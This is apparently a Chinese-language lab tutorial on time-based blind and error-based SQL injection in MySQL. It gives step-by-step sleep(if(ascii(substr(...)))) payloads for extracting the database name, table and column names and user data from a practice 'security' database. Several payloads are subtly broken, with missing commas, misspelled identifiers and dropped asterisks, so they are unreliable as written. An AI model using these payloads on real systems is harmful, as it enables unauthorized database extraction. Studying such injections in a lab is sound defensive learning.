sleep注入
获取库名
and sleep(if(ascii(substr(database(),1,1))<116,0,5)) %23
and sleep(if(ascii(substr(database(),1,1))<115,0,5)) %23
如果116立即执行 115延迟5秒 证明ascii为115 对照得数据库首位为s 以此类推得出数据库名
获取表名
and sleep(if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1)1,1))<102,0,5)) %23
and sleep(if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1)1,1))<101,0,5)) %23
102立即执行 101延迟五秒 limit0,1可以更换 查询其他的表
获取字段名
and sleep(if(ascii(substr((select column_name from information_schema.colimns where table_name='users' and table_schemn='security' limit 0,1)1,1))<106,0,5)) %23
and sleep(if(ascii(substr((select column_name from information_schema.colimns where table_name='users' and table_schemn='security' limit 0,1)1,1))<105,0,5)) %23
根据延时可以得到第一个字段的第一个字母 更换limit后面参数 以此类推 得到第一个字段名 以及其他字段名
获取表里面的值
and sleep(if(ascii(substring((select username from security.users limit 0,1)1,1))<69,0,5)) %23
and sleep(if(ascii(substring((select username from security.users limit 0,1)1,1))<68,0,5)) %23
得到ascii值为68 以此类推 得到该用户名
if(payload,sleep(3),1)
payload正确时 程序暂停3秒 否则立刻执行
if(payload,1,sleep(3))
payload正确时 程序立刻执行 否则暂停3秒
1.PNG
MySQL原句
update user set password = 'admin' where password = (select 1 from (select count(),(concat("",database(),"",floor(rand()2))) name from information_schema.tables group by name)b);
表单中
and (select 1 from (select count(),(concat("",database(),"",floor(rand()2))) name from information_schema.tables group by name)b) #&submit=submit
网友评论